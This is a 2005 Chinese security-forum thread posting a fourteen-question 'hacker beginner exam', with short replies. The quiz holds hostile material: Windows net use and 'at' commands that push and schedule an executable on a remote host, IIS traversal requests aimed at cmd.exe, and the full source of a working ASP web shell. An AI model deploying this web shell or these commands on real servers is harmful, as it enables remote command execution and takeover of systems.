|
 | 作者: xp0710 [xp0710]
 论坛用户 |
登录 |
| 本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521 三个连接指向同一目标网站,那么它们分别是什么意义? 二、 常用端口识别 20 21 23 25 80 110 139 443 445 三、 试述下列命令作用 c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” c:\>net use z: \\211.87.194.121\c$ c:\>net time \\211.87.194.121 c:\>copy abc.exe \\211.87.194.121\admin$\system32 四、 试述下列命令的区别,如何防止该命令在本地或远程运行 c:\>at \\211.87.194.121 21:05 abc.exe c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 五、 W3SVC日志是什么?分析下面这段日志。 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 分析我酌情给分。 六、 netstat命令有何作用,举出两个参数进行说明。 七、 试述木马的一些基本特征。 八、 如何利用脚本实现对ftp的自动操作? 九、 下面是一个ASP木马,请找出支持这一程序的关键点。 <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name=".CMD" size=45 value="<%= szCMD %>"> <input type=submit value="Run"> </FORM> <PRE> <% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> </BODY> </HTML> 十、 存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分) 那么,如何在不打补丁的情况下避免这种攻击的发生? 十一、OSI模型中哪一层上有协议?分别是什么? 十二、观察ping命令的返回包的TTL值,可以了解到什么? 十三、从网关得到采样 目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646 目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647 目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69 请问 这可能是什么样的会话,采用什么协议,进行什么样的作业? 十四、谈谈你对hacker和网络安全的认识 |
| 地主 发表时间: 05-05-27 17:31 |
 | 回复: toumings3 [toumings3]  论坛用户 |
登录 |
|
呵呵 基本上都看的懂 不过还要继续努力  |
| B1层 发表时间: 05-05-27 19:45 |
 | 回复: on89757 [zhaowenli]  论坛用户 |
登录 |
|
前面能看懂。 后面的代码就看不明白了。 还得多学习~ |
| B2层 发表时间: 05-05-29 11:47 |
 | 回复: hllnw [hllnw]  论坛用户 |
登录 |
|
您说说呀 |
| B3层 发表时间: 05-07-20 10:48 |
 | 回复: authen [authen] 论坛用户 |
登录 |
|
这种问题招人工资不会超过800 |
| B4层 发表时间: 05-07-20 13:14 |
| 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
这种问题招人工资不会超过800 不知道什么地方招工会出这样的问题!~ 呵呵!~~ 不过我觉得要是考这样问题的公司 公司绝对不会少于2K RMB |
| B5层 发表时间: 05-07-20 18:57 |
| 回复: authen [authen] 论坛用户 |
登录 |
 这样的话俺的工资应该超过1W了 |
| B6层 发表时间: 05-07-21 10:34 |
 | 回复: tuzi [tuzi] 版主 |
登录 |
|
N久不到菜鸟园中来了 灌个谁 11 这项我是没看明白 十一、OSI模型中哪一层上有协议?分别是什么? 哪层都有协议 如果要说出来 恐怕要说不完了 |
| B7层 发表时间: 05-07-21 15:23 |
 | 回复: zoull2004 [zoull2004]  论坛用户 |
登录 |
|
一,第一个表示IP地址,第二、三应该是域名 六,用netstate?命令 |
| B8层 发表时间: 05-07-22 09:03 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 一份黑客菜鸟试卷,欢迎各位朋友作答